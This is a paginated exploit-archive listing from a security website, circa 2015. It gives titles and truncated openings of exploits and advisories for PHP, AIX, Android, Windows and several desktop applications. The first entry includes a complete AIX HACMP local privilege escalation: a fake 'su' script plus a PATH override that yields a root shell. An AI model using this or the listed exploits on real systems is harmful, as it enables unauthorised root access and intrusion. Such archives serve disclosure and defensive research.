首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
IBM AIX HACMP Privlege Escalation
  日期:2015-09-10 18:13:47 点击:321 评论:0
IBM AIX High Availability Cluster Multiprocessing (HACMP) LPE to root 0dayLet's kill some more bugs today and force vendor improvement :)$ cat /tmp/su#!/bin/sh/bin/sh$ chmod +x /tmp/su$ PATH=/tmp /usr/es/sbin/cluster/utilities/clpasswd# /usr/bin/who
Disconnect.me 2.0 Local Root Exploit
  日期:2015-09-10 18:12:50 点击:33 评论:0
Disconnect.me is the search engine entrusted by the Tor Browser. Unfortunately, the Mac OS X client has an LPE to root vulnerability (0day). Original Download = v2.0: https://disconnect.me/premium/mac Archived Download: http://d-h.st/LKqG Disconnect
Android Stagefright - Remote Code Execution
  日期:2015-09-10 18:11:45 点击:124 评论:0
#!/usr/bin/env python # Joshua J. Drake (@jduck) of ZIMPERIUM zLabs # Shout outs to our friends at Optiv (formerly Accuvant Labs) # (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015 # www.zimperium.com # # Exploit for RCE Vulnerabili
PHP unserialize() Use-After-Free Vulnerabilities
  日期:2015-09-10 18:10:29 点击:49 评论:0
Use After Free Vulnerabilities in unserialize() Taoguang Chen [@chtg]( http://github.com/chtg ) Write Date: 2015.7.31 Release Date: 2015.9.4 Multiple use-after-free vulnerabilities were discovered in unserialize() with Serializable class that can be
PHP Session Deserializer Use-After-Free
  日期:2015-09-10 18:09:51 点击:80 评论:0
Use After Free Vulnerabilities in Session Deserializer Taoguang Chen [@chtg]( http://github.com/chtg ) Write Date: 2015.8.9 Release Date: 2015.9.4 Multiple use-after-free vulnerabilities were discovered in session deserializer (php/php_binary/php_ser
PHP SplObjectStorage unserialize() Use-After-Free
  日期:2015-09-10 18:09:01 点击:20 评论:0
Yet Another Use After Free Vulnerability in unserialize() with SplObjectStorage Taoguang Chen [@chtg]( http://github.com/chtg ) Write Date: 2015.8.27 Release Date: 2015.9.4 A use-after-free vulnerability was discovered in unserialize() with SplObject
PHP GMP unserialize() Use-After-Free
  日期:2015-09-10 18:08:34 点击:63 评论:0
Use After Free Vulnerability in unserialize() with GMP Taoguang Chen [@chtg]( http://github.com/chtg ) Write Date: 2015.8.17 Release Date: 2015.9.4 A use-after-free vulnerability was discovered in unserialize() with GMP object's deserialization that
PHP SplDoublyLinkedList unserialize() Use-After-Free
  日期:2015-09-10 18:07:52 点击:26 评论:0
Yet Another Use After Free Vulnerability in unserialize() with SplDoublyLinkedList Taoguang Chen [@chtg]( http://github.com/chtg ) - Write Date: 2015.8.27 Release Date: 2015.9.4 A use-after-free vulnerability was discovered in unserialize() with SplD
Endian Firewall Proxy Password Change Command Injection
  日期:2015-09-08 18:01:05 点击:25 评论:0
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::E
VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow
  日期:2015-09-08 18:00:27 点击:31 评论:0
#************************************************************************************************************* # # Exploit Title: VeryPDF HTML Converter v2.0 SEH/ToLower() Bypass Buffer Overflow # Date: 9-6-2015 # Target tested: Windows 7 (x86/x64) #
Disconnect.me Mac OS X Client <= 2.0 - Local Privilege Escalation
  日期:2015-09-07 15:58:36 点击:52 评论:0
Disconnect.me is the search engine entrusted by the Tor Browser. Unfortunately, the Mac OS X client has an LPE to root vulnerability (0day). Original Download
AutoCAD DWG and DXF To PDF Converter 2.2 - Buffer Overflow
  日期:2015-09-07 15:56:03 点击:49 评论:0
#*************************************************************************************************************# # Exploit Title: AutoCAD DWG and DXF To PDF Converter v2.2 Buffer Overflow# Date: 9-5-2015# Software Link: http://www.verypdf.com/autocad-
Windows Registry Only Persistence
  日期:2015-09-06 18:05:15 点击:72 评论:0
### This module requires Metasploit: http://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'msf/core'require 'msf/core/exploit/powershell'require 'msf/core/post/file'class Metasploit4 Msf::Exploit::L
Windows Escalate UAC Protection Bypass
  日期:2015-09-06 18:04:25 点击:75 评论:0
### This module requires Metasploit: http://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'msf/core'class Metasploit3 Msf::Exploit::Local Rank = ExcellentRanking include Exploit::FileDropper include
SphereFTP Server 2.0 - Crash PoC
  日期:2015-09-06 18:02:47 点击:18 评论:0
#!/usr/bin/python # Exploit Title: SphereFTP Server v2.0 Remote Crash PoC # Date: 2015-09-02 # Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com # Vendor Homepage: http://www.menasoft.com/blog/?p=32 # Software Link: http://www.
XGI Windows VGA Display Manager 6.14.10.1090 - Arbitrary Write PoC
  日期:2015-09-02 13:34:39 点击:30 评论:0
KL-001-2015-004 : XGI Windows VGA Display Manager Arbitrary Write Privilege Escalation Title: XGI Windows VGA Display Manager Arbitrary Write Privilege Escalation Advisory ID: KL-001-2015-004 Publication Date: 2015.09.01 Publication URL: https://www.
SiS Windows VGA Display Manager 6.14.10.3930 - Write-What-Where PoC
  日期:2015-09-02 13:33:44 点击:49 评论:0
KL-001-2015-003 : SiS Windows VGA Display Manager Multiple Privilege Escalation Title: SiS Windows VGA Display Manager Multiple Privilege Escalation Advisory ID: KL-001-2015-003 Publication Date: 2015.09.01 Publication URL: https://www.korelogic.com/
Mpxplay Multimedia Commander 2.00a - .m3u Stack-Based Buffer Overflow
  日期:2015-09-02 13:32:57 点击:31 评论:0
******************************************************************************************** # Exploit Title: Mpxplay Multimedia Commander Stack-based BOF # Date: 9/1/2015 # Exploit Author: Un_N0n # Software Link: http://sourceforge.net/p/mpxplay/act
Boxoft WAV to MP3 Converter - convert Feature Buffer Overflow
  日期:2015-09-01 13:09:30 点击:28 评论:0
#Exploit Title: Boxoft wav to mp3 converter SEH bypass technique tested on Win7x64 # Date: 8-31-2015 # Software Link: http://www.boxoft.com/wav-to-mp3/ # Exploit Author: Robbie Corley # Contact: c0d3rc0rl3y@gmail.com # Website: # Target: Windows 7 En
Viber 4.2.0 - Non-Printable Characters Handling Denial of Service Vulnerability
  日期:2015-09-01 13:08:51 点击:214 评论:0
#!/usr/bin/perl -w #-*- coding: utf-8 -* # #[+] Title: Viber Non-Printable Characters Handling Denial of Service Vulnerability #[+] Product: Viber #[+] Vendor: http://www.viber.com/en/ #[+] SoftWare Link : https://itunes.apple.com/app/viber-free-phon
共637页/12733条记录 首页 上一页 [134] [135] [136] 137 [138] [139] [140] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved